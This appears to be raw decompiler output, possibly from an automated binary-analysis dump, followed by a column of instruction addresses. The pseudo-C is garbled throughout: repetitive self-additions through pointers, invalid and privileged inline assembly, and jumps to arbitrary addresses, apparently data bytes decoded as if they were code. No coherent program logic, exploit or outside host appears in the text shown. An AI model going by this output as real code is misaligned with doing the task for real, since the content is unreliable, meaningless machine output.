                        				 *((intOrPtr*)(_t512 + 0x45)) =  *((intOrPtr*)(_t512 + 0x45)) + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + 0xffffffac;
                        				 *((intOrPtr*)(_t512 + 0x6106)) =  *((intOrPtr*)(_t512 + 0x6106)) + _t547;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t512 =  *_t512 + _t446;
                        				 *((intOrPtr*)(_t609 - 0x69efe2e8)) =  *((intOrPtr*)(_t609 - 0x69efe2e8)) + _t446;
                        				 *_t547 =  *_t547 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t547 = 0x7a;
                        				_t448 = _t446 +  *_t446 + 0x2b;
                        				_push(es);
                        				asm("arpl [eax], ax");
                        				 *_t448 =  *_t448 + _t448;
                        				 *_t448 =  *_t448 + _t448;
                        				 *_t547 = 0x75;
                        				_t450 = _t448 +  *_t448 + 0xb0;
                        				_push(es);
                        				asm("arpl [eax], ax");
                        				 *_t450 =  *_t450 + _t450;
                        				 *_t450 =  *_t450 + _t450;
                        				 *_t547 = 0x6b;
                        				_t452 = _t450 +  *_t450 + 0xb8;
                        				_push(es);
                        				 *[gs:edx+0x45] =  *[gs:edx+0x45] + _t547;
                        				 *_t452 =  *_t452 + _t452;
                        				 *_t452 =  *_t452 + _t452;
                        				_t548 = _t452;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t454 = _t547 + 0x66;
                        				 *((intOrPtr*)(_t512 + _t616)) =  *((intOrPtr*)(_t512 + _t616)) + _t548;
                        				 *_t454 = _t512;
                        				asm("sbb eax, 0x66000610");
                        				 *((intOrPtr*)(_t609 + 0x45)) =  *((intOrPtr*)(_t609 + 0x45)) + _t585;
                        				 *_t454 =  *_t454 + _t454;
                        				 *_t454 =  *_t454 + _t454;
                        				 *_t454 =  *_t454 + 0x50;
                        				_t456 = _t454 + _t585 + 0x2b8c0066;
                        				 *_t456 =  *_t456 + _t456;
                        				 *_t456 =  *_t456 + _t456;
                        				_t514 =  *_t456;
                        				 *_t456 =  *_t454;
                        				asm("sbb eax, 0x67000610");
                        				 *((intOrPtr*)(_t456 + 0x45)) =  *((intOrPtr*)(_t456 + 0x45)) + _t456;
                        				 *((intOrPtr*)(_t514 - 0x2bff2600)) =  *((intOrPtr*)(_t514 - 0x2bff2600)) + _t456;
                        				_t457 = _t456 + 0x45ac0067;
                        				 *_t457 =  *_t457 + _t457;
                        				 *_t457 =  *_t457 + _t457;
                        				 *_t457 = _t548;
                        				_t459 = (_t457 ^ 0x68063c0d) + _t514;
                        				_t617 =  &(_t616[0]);
                        				 *_t459 =  *_t459 + _t459;
                        				 *_t459 =  *_t459 + _t459;
                        				_t550 =  *_t459;
                        				 *_t459 =  *_t457;
                        				 *__edx = 5;
                        				_push(0x45f400);
                        				 *_t459 =  *_t459 + _t459;
                        				 *((intOrPtr*)(_t609 - 0x40efe2e8)) =  *((intOrPtr*)(_t609 - 0x40efe2e8)) + _t459;
                        				_push(es);
                        				_push(0x460c00);
                        				 *_t459 =  *_t459 + _t459;
                        				 *((intOrPtr*)(_t609 - 0x40efe2e8)) =  *((intOrPtr*)(_t609 - 0x40efe2e8)) + _t459;
                        				_push(es);
                        				_push(0);
                        				_t460 = _t459 & 0x00000046;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				asm("out 0x1, al");
                        				asm("fimul word [0x6c05e6]");
                        				 *_t514 = gs;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				_t515 =  *_t460;
                        				 *_t460 = _t514;
                        				asm("sbb eax, 0x6d000610");
                        				 *((intOrPtr*)(_t609 + _t460 * 2)) =  *((intOrPtr*)(_t609 + _t460 * 2)) + _t515;
                        				 *_t460 =  *_t460 + _t460;
                        				 *((intOrPtr*)(_t515 + 0x600bb00)) =  *((intOrPtr*)(_t515 + 0x600bb00)) + _t460;
                        				 *_t617 =  *_t617 + _t550;
                        				 *_t515 = gs;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				_t516 =  *_t460;
                        				 *_t460 = _t515;
                        				asm("sbb eax, 0x6d000610");
                        				_t610 = _t609 + 1;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + 0xffffffc9;
                        				_t587 = _t585 + _t550 + _t460;
                        				_push(es);
                        				asm("insd");
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t550 =  *_t550 + _t460;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *_t460 =  *_t460 + _t460;
                        				_push(_t516);
                        				_t462 = _t460 + 0x10000;
                        				 *_t550 =  *_t550 + _t462;
                        				 *((intOrPtr*)(_t462 + 0x210100f)) =  *((intOrPtr*)(_t462 + 0x210100f)) + _t516;
                        				_t463 = _t462 + _t550;
                        				asm("sldt word [eax]");
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t516 =  *_t516 | _t550;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *0x10000 =  *0x10000 & _t463;
                        				_t517 = ss;
                        				_push(es);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				_t465 = _t463 - 1 +  *((intOrPtr*)(_t463 - 1));
                        				 *_t587 =  *_t587 + _t465;
                        				_t617[5] = _t617[5] + _t587;
                        				asm("adc [eax], dl");
                        				_t466 = _t465 +  *_t465;
                        				_push(_t617);
                        				asm("adc dl, [eax]");
                        				asm("adc [eax+eax], al");
                        				asm("bound edx, [edx]");
                        				 *_t466 =  *_t466 + _t466;
                        				 *_t466 =  *_t466 + _t466;
                        				 *_t466 =  *_t466 + _t466;
                        				 *_t466 =  *_t466 + _t466;
                        				_push(cs);
                        				 *_t466 =  *_t466 + _t466;
                        				 *_t466 =  *_t466 + _t466;
                        				asm("adc dword [edx], 0x10000");
                        				_t631 = _t629 + 2;
                        				_push(cs);
                        				 *_t466 =  *_t466 + _t466;
                        				 *_t466 =  *_t466 + _t466;
                        				asm("loope 0x3");
                        				 *_t466 =  *_t466 + _t466;
                        				_t467 = _t466 +  *_t466;
                        				goto 0xe100;
                        				 *_t467 =  *_t467 + _t467;
                        				 *_t587 =  *_t587 + _t467;
                        				_t588 = _t587 + _t550;
                        				 *_t467 =  *_t467 + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t610 + _t550)) =  *((intOrPtr*)(_t610 + _t550)) + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t610 + _t550)) =  *((intOrPtr*)(_t610 + _t550)) + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t610 + 0x1000001)) =  *((intOrPtr*)(_t610 + 0x1000001)) + _t550;
                        				 *((intOrPtr*)(_t467 + 0x1000008)) =  *((intOrPtr*)(_t467 + 0x1000008)) + _t550;
                        				 *_t550 =  *_t550 + _t467;
                        				_push(cs);
                        				 *_t467 =  *_t467 + _t467;
                        				 *_t467 =  *_t467 + _t467;
                        				goto 0xa800;
                        				 *_t467 =  *_t467 | _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t467 + 0x1000008)) =  *((intOrPtr*)(_t467 + 0x1000008)) + _t550;
                        				 *((intOrPtr*)(_t467 + 0x1000008)) =  *((intOrPtr*)(_t467 + 0x1000008)) + _t550;
                        				_t617[0x400004] = _t617[0x400004] + _t467;
                        				 *((intOrPtr*)(_t467 + 0x200000e)) =  *((intOrPtr*)(_t467 + 0x200000e)) + _t588;
                        				 *((intOrPtr*)(_t550 + _t550)) =  *((intOrPtr*)(_t550 + _t550)) + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t467 + 0x200000e)) =  *((intOrPtr*)(_t467 + 0x200000e)) + _t588;
                        				 *((intOrPtr*)(_t550 + _t550)) =  *((intOrPtr*)(_t550 + _t550)) + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t467 + 0x200000e)) =  *((intOrPtr*)(_t467 + 0x200000e)) + _t588;
                        				 *((intOrPtr*)(_t550 + _t550)) =  *((intOrPtr*)(_t550 + _t550)) + _t467;
                        				 *_t550 =  *_t550 + _t467;
                        				 *((intOrPtr*)(_t467 + 0x1000015)) =  *((intOrPtr*)(_t467 + 0x1000015)) + _t517;
                        				 *((intOrPtr*)(_t517 + _t550 + 0x20000)) =  *((intOrPtr*)(_t517 + _t550 + 0x20000)) + _t467;
                        				_t551 = _t550 +  *_t550;
                        				 *_t467 =  *_t467 + _t467;
                        				 *_t467 =  *_t467 + _t467;
                        				_t468 = _t598;
                        				_t599 = _t467;
                        				 *_t468 =  *_t468 | _t468;
                        				 *_t551 =  *_t551 + _t468;
                        				_t518 = _t517 + _t551;
                        				_t469 = _t468 +  *_t468;
                        				 *_t551 =  *_t551 + _t469;
                        				 *((intOrPtr*)(_t469 + 0x200000e)) =  *((intOrPtr*)(_t469 + 0x200000e)) + _t588;
                        				_t470 = _t469 + _t469;
                        				asm("adc [eax], eax");
                        				 *_t551 =  *_t551 + _t470;
                        				 *((intOrPtr*)(_t470 + 0x200000e)) =  *((intOrPtr*)(_t470 + 0x200000e)) + _t588;
                        				_t471 = _t470 + _t470;
                        				asm("adc [eax], eax");
                        				 *_t551 =  *_t551 + _t471;
                        				 *((intOrPtr*)(_t471 + 0x200000e)) =  *((intOrPtr*)(_t471 + 0x200000e)) + _t588;
                        				_t472 = _t471 + _t471;
                        				asm("adc [eax], eax");
                        				 *_t551 =  *_t551 + _t472;
                        				 *_t610 =  *_t610 + _t518;
                        				asm("adc [edx], al");
                        				 *_t551 =  *_t551 + _t551;
                        				_t473 = _t472 |  *_t472;
                        				 *_t551 =  *_t551 + _t473;
                        				 *((intOrPtr*)(_t473 + 0x2000013)) =  *((intOrPtr*)(_t473 + 0x2000013)) + _t473;
                        				 *_t551 =  *_t551 + _t473;
                        				asm("adc al, 0x0");
                        				 *_t518 =  *_t518 + _t473;
                        				 *((intOrPtr*)(_t610 + _t551 + 0x10000)) =  *((intOrPtr*)(_t610 + _t551 + 0x10000)) + _t473;
                        				 *0x03000025 =  *((intOrPtr*)(0x3000025)) + _t473;
                        				_t553 = 0x1000012 + _t518;
                        				_t474 = _t473 +  *_t473;
                        				 *_t518 =  *_t518 + _t474;
                        				_t475 = _t474 + _t553;
                        				 *_t475 =  *_t475 | _t475;
                        				 *((intOrPtr*)(_t475 + _t475)) =  *((intOrPtr*)(_t475 + _t475)) + _t475;
                        				asm("in eax, dx");
                        				asm("adc eax, [eax]");
                        				 *0x9e100 =  *0x9e100 + _t475;
                        				 *_t610 =  *_t610 + _t475;
                        				_t590 = _t588 +  *_t472 + _t588 +  *_t472;
                        				asm("adc eax, [eax]");
                        				 *0x1000012 =  *0x1000012 + _t475;
                        				 *((intOrPtr*)(_t518 + 5)) =  *((intOrPtr*)(_t518 + 5)) + _t590;
                        				 *_t475 =  *_t475 + _t475;
                        				_t476 = _t475 +  *_t475;
                        				_push(0xd);
                        				 *_t476 =  *_t476 + _t476;
                        				 *_t476 =  *_t476 + _t476;
                        				 *_t476 =  *_t476 + _t476;
                        				 *_t476 =  *_t476 + _t476;
                        				 *_t476 =  *_t476 + _t476;
                        				 *_t476 =  *_t476 + _t476;
                        				asm("scasd");
                        				asm("adc al, [eax]");
                        				 *_t590 =  *_t590 + _t476;
                        				 *((intOrPtr*)(_t590 + _t590 + 0x10000)) =  *((intOrPtr*)(_t590 + _t590 + 0x10000)) + _t590;
                        				asm("loope 0x3");
                        				 *_t476 =  *_t476 + _t476;
                        				_t477 = _t476 +  *_t476;
                        				goto 0xe100;
                        				 *_t477 =  *_t477 + _t477;
                        				 *_t590 =  *_t590 + _t477;
                        				_t478 = _t477 +  *_t477;
                        				goto 0xe100;
                        				 *_t478 =  *_t478 + _t478;
                        				 *_t590 =  *_t590 + _t478;
                        				goto 0x3e00;
                        				_t480 = _t478 +  *_t478 |  *(_t478 +  *_t478);
                        				 *0x1000012 =  *0x1000012 + _t480;
                        				 *((intOrPtr*)(_t480 + 0x1000008)) =  *((intOrPtr*)(_t480 + 0x1000008)) + _t553;
                        				 *0x02000024 =  *((intOrPtr*)(0x2000024)) + _t518;
                        				 *((intOrPtr*)(0x2000024)) =  *((intOrPtr*)(0x2000024)) + _t518;
                        				 *((intOrPtr*)(_t480 + 0x1000008)) =  *((intOrPtr*)(_t480 + 0x1000008)) + _t553;
                        				 *0x01000025 =  *((intOrPtr*)(0x1000025)) + _t480;
                        				 *_t480 =  *_t480 + _t480;
                        				_t481 = _t480 +  *_t480;
                        				asm("lock add eax, [eax]");
                        				 *0x1000012 =  *0x1000012 + _t481;
                        				 *((intOrPtr*)(_t481 + 0xa)) =  *((intOrPtr*)(_t481 + 0xa)) + _t590;
                        				 *_t481 =  *_t481 + _t481;
                        				_t482 = _t481 +  *_t481;
                        				asm("popad");
                        				asm("adc eax, [eax]");
                        				 *0x1000012 =  *0x1000012 + _t482;
                        				 *((intOrPtr*)(_t631 + _t590)) =  *((intOrPtr*)(_t631 + _t590)) + _t590;
                        				 *0x1000012 =  *0x1000012 + _t482;
                        				 *((intOrPtr*)(_t610 + 0x1000012)) =  *((intOrPtr*)(_t610 + 0x1000012)) + _t482;
                        				 *0x1000012 =  *0x1000012 + _t482;
                        				 *((intOrPtr*)(_t610 + 0x1000012)) =  *((intOrPtr*)(_t610 + 0x1000012)) + _t590;
                        				 *0x1000012 =  *0x1000012 + _t482;
                        				 *((intOrPtr*)(_t590 + 0xd)) =  *((intOrPtr*)(_t590 + 0xd)) + _t553;
                        				 *_t482 =  *_t482 + _t482;
                        				_t483 = _t482 +  *_t482;
                        				 *0x01000017 =  *((intOrPtr*)(0x1000017)) + _t553;
                        				 *_t483 =  *_t483 + _t483;
                        				asm("cmpsb");
                        				_t485 = _t483 +  *_t483 |  *(_t483 +  *_t483);
                        				 *0x1000012 =  *0x1000012 + _t485;
                        				 *((intOrPtr*)(_t610 + 0x1000012)) =  *((intOrPtr*)(_t610 + 0x1000012)) + _t485;
                        				 *0x1000012 =  *0x1000012 + _t485;
                        				 *0x07000714 =  *((intOrPtr*)(0x7000714)) + _t518;
                        				 *_t485 =  *_t485 + _t553;
                        				 *_t610 =  *_t610 + _t485;
                        				 *0x1000012 =  *0x1000012 + _t553;
                        				 *_t610 =  *_t610 + _t485;
                        				 *0x100000a =  *0x100000a + _t553;
                        				 *_t610 =  *_t610 + _t485;
                        				 *((intOrPtr*)(_t485 + _t485)) =  *((intOrPtr*)(_t485 + _t485)) + _t485;
                        				 *_t485 =  *_t485 ^ _t485;
                        				 *_t485 =  *_t485 | _t485;
                        				asm("sbb eax, 0x11000110");
                        				 *0x19000610 =  *0x19000610 + _t518;
                        				 *0x29000a10 =  *0x29000a10 + _t518;
                        				 *0x31001010 =  *0x31001010 + _t518;
                        				 *0x39001010 =  *0x39001010 + _t518;
                        				 *0x41001010 =  *0x41001010 + _t518;
                        				 *0x49001010 =  *0x49001010 + _t518;
                        				 *0x51001010 =  *0x51001010 + _t518;
                        				 *0x59001010 =  *0x59001010 + _t518;
                        				 *0x61001010 =  *0x61001010 + _t518;
                        				 *0x69001510 =  *0x69001510 + _t518;
                        				 *0x71001010 =  *0x71001010 + _t518;
                        				 *0x79001010 =  *0x79001010 + _t518;
                        				 *0x89001010 =  *0x89001010 + _t518;
                        				 *0x99000610 =  *0x99000610 + _t518;
                        				 *0x79001a10 =  *0x79001a10 + _t518;
                        				 *0x81000610 =  *0x81000610 + _t518;
                        				 *0x89002710 =  *0x89002710 + _t518;
                        				 *0xa9000610 =  *0xa9000610 + _t518;
                        				 *0xb9002d10 =  *0xb9002d10 + _t518;
                        				_t618 = _t617 + _t610;
                        				asm("adc al, 0x3d");
                        				 *_t599 =  *_t599 + _t599;
                        				_t486 =  >=  ?  *_t485 : _t485;
                        				asm("rol dword [ecx], 0x14");
                        				asm("adc al, 0x4a");
                        				 *0x07101D12 =  *((intOrPtr*)(0x7101d12)) + _t486;
                        				_t555 = _t553 + _t485 + _t553 + _t485;
                        				 *0xc9004f05 =  *0xc9004f05 + _t631;
                        				 *((intOrPtr*)(_t518 - 0x36ffa9f1)) =  *((intOrPtr*)(_t518 - 0x36ffa9f1)) + _t486;
                        				 *((intOrPtr*)(_t599 - 0x36ffa9f1)) =  *((intOrPtr*)(_t599 - 0x36ffa9f1)) + 0x100000a;
                        				 *0xc9005c05 =  *0xc9005c05 + _t631;
                        				 *_t486 =  *_t486 + _t618;
                        				_push(ss);
                        				asm("popad");
                        				 *((intOrPtr*)(_t486 + _t486)) =  *((intOrPtr*)(_t486 + _t486)) + _t555;
                        				_t619 = _t618 + _t610;
                        				asm("adc al, 0x72");
                        				 *((intOrPtr*)(_t486 + _t486)) =  *((intOrPtr*)(_t486 + _t486)) + _t555;
                        				asm("adc al, 0x14");
                        				asm("insb");
                        				 *((intOrPtr*)(_t486 + _t486)) =  *((intOrPtr*)(_t486 + _t486)) + _t555;
                        				asm("aas");
                        				asm("invalid");
                        				 *((intOrPtr*)(_t486 + _t486)) =  *((intOrPtr*)(_t486 + _t486)) + 0x100000a;
                        				asm("adc al, 0x0");
                        				asm("sahf");
                        				 *(_t518 + 0x1d001c00) =  *(_t518 + 0x1d001c00) | _t486;
                        				asm("adc [esi+0x1d001400], dl");
                        				asm("adc [eax+eax+0x89e0024], bl");
                        				 *_t486 =  *_t486 + 0x2c;
                        				 *0x24009610 =  *0x24009610 + _t518;
                        				 *0x34009c10 =  *0x34009c10 + _t518;
                        				 *((intOrPtr*)(_t610 + 0x3c008308)) =  *((intOrPtr*)(_t610 + 0x3c008308)) + _t518;
                        				 *0x34009610 =  *0x34009610 + _t518;
                        				 *0x44009c10 =  *0x44009c10 + _t518;
                        				 *((intOrPtr*)(_t610 - 0x16ff7cf8)) =  *((intOrPtr*)(_t610 - 0x16ff7cf8)) + _t518;
                        				 *((intOrPtr*)(_t486 + 0x13)) =  *((intOrPtr*)(_t486 + 0x13)) + 0x100000a;
                        				asm("fild dword [eax]");
                        				 *0x44009610 =  *0x44009610 + _t518;
                        				 *0xb9009c10 =  *0xb9009c10 + _t518;
                        				 *0xb9000110 =  *0xb9000110 + _t518;
                        				 *((intOrPtr*)(_t599 - 0x1eff02eb)) =  *((intOrPtr*)(_t599 - 0x1eff02eb)) + 0x100000a;
                        				 *((intOrPtr*)(_t610 - 0x16fefcf7)) =  *((intOrPtr*)(_t610 - 0x16fefcf7)) + 0x1000012;
                        				 *((intOrPtr*)(0x1000025)) =  *((intOrPtr*)(0x1000025)) + 0x1000012;
                        				es = 0xb9006c08;
                        				 *0x5911FC12 =  *((intOrPtr*)(0x5911fc12)) + _t486;
                        				 *((intOrPtr*)(_t486 + _t486 + 0x20)) =  *((intOrPtr*)(_t486 + _t486 + 0x20)) + 0x100000a;
                        				_push(ss);
                        				_t633 = 1;
                        				 *_t486 =  *_t486 + _t486;
                        				_push(ss);
                        				_push(1);
                        				 *[fs:eax] =  *[fs:eax] + _t486;
                        				_push(ss);
                        				_push(1);
                        				 *0x5c000610 =  *0x5c000610 + _t518;
                        				 *0x64000610 =  *0x64000610 + _t518;
                        				 *0x5c000610 =  *0x5c000610 + _t518;
                        				 *0x1000012 =  *0x1000012 + 0x100000a;
                        				 *0x1000012 =  *0x1000012 + 0x100000a;
                        				 *0x1000012 =  *0x1000012 + 0x100000a;
                        				 *0x02000014 =  *((intOrPtr*)(0x2000014)) + 0x100000a;
                        				_t487 = _t619;
                        				_t620 = _t486;
                        				_t559 = _t555 +  *((intOrPtr*)(_t486 + _t486 + 0x64)) +  *((intOrPtr*)(_t486 + _t486 + 0x54)) +  *((intOrPtr*)(_t486 + _t486 + 0x54)) + _t610;
                        				 *0x54001010 =  *0x54001010 + _t518;
                        				 *0x100000a =  *0x100000a + _t559;
                        				 *(_t620 + 0x3401f901) =  *(_t620 + 0x3401f901) | 0x0100000a;
                        				asm("adc bl, [ebx+0xa005c01]");
                        				 *(_t620 + 0xa006401) =  *(_t620 + 0xa006401) | 0x0100000a;
                        				 *(_t620 + 0x1d006c01) =  *(_t620 + 0x1d006c01) | 0x0100000a;
                        				asm("adc [esi-0x3fffac00], dl");
                        				 *(_t620 + 0xa01e901) =  *(_t620 + 0xa01e901) | _t610;
                        				_t621 = _t620 | _t487;
                        				 *((intOrPtr*)(_t487 + _t487 + 0x28)) =  *((intOrPtr*)(_t487 + _t487 + 0x28)) + 0x100000a;
                        				asm("adc eax, [ecx]");
                        				 *((intOrPtr*)(_t487 + _t487 - 0x27)) =  *((intOrPtr*)(_t487 + _t487 - 0x27)) + 0x100000a;
                        				asm("adc al, 0xd7");
                        				 *0xFFFFFFFFDC055D12 =  *((intOrPtr*)(0xffffffffdc055d12)) + _t487;
                        				 *0x1000012 =  *0x1000012 + _t487;
                        				 *0x0201E10E =  *((intOrPtr*)(0x201e10e)) + _t621;
                        				 *((intOrPtr*)(_t621 + 0x16)) =  *((intOrPtr*)(_t621 + 0x16)) + _t610;
                        				goto 0xf409;
                        				 *0x1000012 =  *0x1000012 + 0x100000a;
                        				_t519 = _t633;
                        				_t489 = _t487 + 0x2190214;
                        				 *(0x100000a + _t489) =  *(0x100000a + _t489) | _t489;
                        				 *0xe9000610 =  *0xe9000610 + _t519;
                        				 *0x0100000E =  *((intOrPtr*)(0x100000e)) + _t519;
                        				_t600 = _t599 | 0x0100000a;
                        				 *0x01000013 =  *((intOrPtr*)(0x1000013)) + 0x1000012;
                        				asm("xlatb");
                        				 *0x49000610 =  *0x49000610 + 0x13;
                        				_t521 = 0x13 + _t600;
                        				_t492 = (_t489 &  *0x100000a) + 0x1000045;
                        				 *0xb9009610 =  *0xb9009610 + _t521;
                        				 *0x49000610 =  *0x49000610 + _t521;
                        				 *((intOrPtr*)(_t610 + 0x10)) =  *((intOrPtr*)(_t610 + 0x10)) + 0x100000a +  *0x1000012;
                        				_t593 = _t633;
                        				_t568 = _t559 +  *_t599 +  *0x100000a + 1 - 1 + _t610 + _t559 +  *_t599 +  *0x100000a + 1 - 1 + _t610 +  *0x1000012 +  *((intOrPtr*)(_t600 + 0x14)) +  *((intOrPtr*)(0x1000013));
                        				if(_t568 >= 0) {
                        					asm("pushad");
                        					_t593 = _t593 +  *0x1000012 + _t521;
                        					_t492 = _t492 + 0x1390266;
                        					_push(_t633);
                        					_t521 = _t521 +  *0x1000012;
                        					 *0x42027220 =  *((intOrPtr*)(0x42027220)) + _t621;
                        				}
                        				_t522 = _t521 +  *((intOrPtr*)(_t621 + 0x16));
                        				if(_t522 < 0) {
                        					_push(_t568);
                        					_t522 = _t522 +  *0x49009610;
                        				}
                        				asm("sbb eax, 0x49009610");
                        				asm("adc eax, 0x149027f");
                        				 *((intOrPtr*)(_t593 + 4)) =  *((intOrPtr*)(_t593 + 4)) + _t600;
                        				_t494 = _t522;
                        				asm("adc [esi], al");
                        				 *((intOrPtr*)(_t494 + _t494 + 0x30)) =  *((intOrPtr*)(_t522 + _t494 + 0x30)) + _t492 + _t593;
                        				_push(ss);
                        				_t495 = _t621;
                        				 *((intOrPtr*)(_t495 + _t495 + 0x31)) =  *((intOrPtr*)(_t495 + _t495 + 0x31)) + _t610;
                        				 *_t495 =  *_t495 + _t495;
                        				_push(ss);
                        				_push(1);
                        				goto 0xc52ba68a;
                        				asm("psrlw mm0, [edx]");
                        			}




















































































































































                        0x00185375
                        0x00185375
                        0x00185377
                        0x0018537d
                        0x0018537e
                        0x00185380
                        0x00185382
                        0x00185382
                        0x00185384
                        0x00185389
                        0x00185390
                        0x00185390
                        0x00185392
                        0x00185393
                        0x00185395
                        0x00185397
                        0x00185399
                        0x0018539a
                        0x0018539c
                        0x0018539e
                        0x0018539e
                        0x001853a0
                        0x001853a2
                        0x001853a3
                        0x001853a5
                        0x001853a7
                        0x001853a9
                        0x001853ab
                        0x001853b1
                        0x001853b3
                        0x001853b5
                        0x001853b5
                        0x001853b7
                        0x001853b9
                        0x001853bf
                        0x001853c1
                        0x001853c4
                        0x001853c6
                        0x001853c8
                        0x001853ce
                        0x001853d0
                        0x001853d1
                        0x001853d3
                        0x001853d5
                        0x001853db
                        0x001853dd
                        0x001853df
                        0x001853e1
                        0x001853e3
                        0x001853e9
                        0x001853ea
                        0x001853ec
                        0x001853ee
                        0x001853f0
                        0x001853f2
                        0x001853f8
                        0x001853fa
                        0x001853fb
                        0x001853fd
                        0x001853ff
                        0x00185405
                        0x00185407
                        0x00185409
                        0x0018540b
                        0x0018540d
                        0x00185419
                        0x0018541b
                        0x00185421
                        0x00185423
                        0x00185425
                        0x00185427
                        0x00185429
                        0x0018542f
                        0x00185431
                        0x00185438
                        0x00185440
                        0x00185441
                        0x00185443
                        0x00185445
                        0x0018544b
                        0x0018544d
                        0x00185453
                        0x00185459
                        0x0018545c
                        0x0018545f
                        0x00185463
                        0x00185465
                        0x0018546a
                        0x00185470
                        0x0018547b
                        0x0018547d
                        0x00185483
                        0x00185485
                        0x0018548c
                        0x00185492
                        0x0018549a
                        0x001854a0
                        0x001854a1
                        0x001854a4
                        0x001854a6
                        0x001854a8
                        0x001854ae
                        0x001854af
                        0x001854b2
                        0x001854b4
                        0x001854b6
                        0x001854bd
                        0x001854c4
                        0x001854cb
                        0x001854cd
                        0x001854d0
                        0x001854d2
                        0x001854d9
                        0x001854db
                        0x001854de
                        0x001854e0
                        0x001854e2
                        0x001854e7
                        0x001854ea
                        0x001854ec
                        0x001854ee
                        0x001854ee
                        0x001854f0
                        0x001854f2
                        0x001854f3
                        0x001854f7
                        0x001854fa
                        0x001854fc
                        0x001854fe
                        0x00185500
                        0x00185503
                        0x0018550a
                        0x0018550c
                        0x0018550d
                        0x00185512
                        0x00185514
                        0x00185516
                        0x00185518
                        0x00185518
                        0x0018551a
                        0x0018551f
                        0x00185522
                        0x00185524
                        0x00185526
                        0x0018552c
                        0x0018552d
                        0x00185534
                        0x00185534
                        0x00185537
                        0x0018553a
                        0x0018553b
                        0x0018553d
                        0x0018553e
                        0x00185540
                        0x00185542
                        0x00185542
                        0x00185544
                        0x00185545
                        0x00185547
                        0x0018554a
                        0x0018554d
                        0x0018554f
                        0x00185555
                        0x00185557
                        0x00185559
                        0x0018555a
                        0x0018555c
                        0x0018555e
                        0x0018555e
                        0x00185565
                        0x00185568
                        0x0018556a
                        0x0018556c
                        0x0018556f
                        0x00185574
                        0x00185577
                        0x00185579
                        0x0018557f
                        0x00185580
                        0x00185581
                        0x00185583
                        0x00185584
                        0x00185586
                        0x00185588
                        0x0018558a
                        0x0018558f
                        0x00185591
                        0x00185592
                        0x00185594
                        0x00185596
                        0x00185596
                        0x0018559d
                        0x001855a0
                        0x001855a2
                        0x001855a4
                        0x001855a6
                        0x001855a9
                        0x001855ac
                        0x001855ad
                        0x001855ae
                        0x001855b0
                        0x001855b4
                        0x001855b6
                        0x001855b7
                        0x001855ba
                        0x001855bb
                        0x001855bc
                        0x001855be
                        0x001855c0
                        0x001855c2
                        0x001855c4
                        0x001855c6
